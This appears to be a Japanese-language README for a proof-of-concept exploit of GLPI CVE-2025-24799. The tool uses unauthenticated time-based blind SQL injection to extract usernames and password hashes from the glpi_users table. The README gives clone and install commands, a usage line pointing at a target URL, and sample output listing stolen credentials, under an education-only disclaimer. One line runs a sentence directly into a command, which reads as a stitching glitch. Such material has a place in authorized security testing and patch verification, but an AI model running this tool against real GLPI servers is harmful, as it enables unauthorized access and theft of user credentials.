
認証不要の時間ベースのブラインドSQLインジェクションを介してGLPI CVE-2025-24799を悪用し、許可されたセキュリティテストのためにglpi_usersからユーザー名とパスワードハッシュを抽出します。
CVE-2025-24799 は、GLPI を対象とした概念実証 (PoC) エクスプロイトです。
このエクスプロイトは、未認証の SQL インジェクション (時間ベースのブラインド) を利用してユーザー認証情報を抽出します。
免責事項: この PoC は教育目的のみで提供されています。許可なくシステムに使用しないでください。
glpi_users テーブルと必要なカラム (name および password) を検出するgit clone https://github.com/Rosemary1337/CVE-2025-24799.git
cd CVE-2025-24799
pip install -r requirements.txt
要件:
requests、colorama、beautifulsoup4
python3 main.py -u <TARGET_URL>
python3 main.py -u http://target.com/index.php/ajax
| フラグ | 説明 | 必須 | デフォルト |
|---|---|---|---|
-u, --url | ターゲット URL | はい | - |
コンソールには次のように表示されます:
[•][✔][✖][i]例:
[•] Exploiting CVE-2025-24799...
[✔] Table 'glpi_users' found.
[✔] Required columns verified.
[i] Starting credential extraction...
[+] Credential 1: admin:5f4dcc3b5aa765d61d8327deb882cf99
[+] Credential 2: user:123456
[*] Extraction complete.
私はツールの構築と知識の共有を楽しむアクティブな開発者です。以下の方法で連絡できます: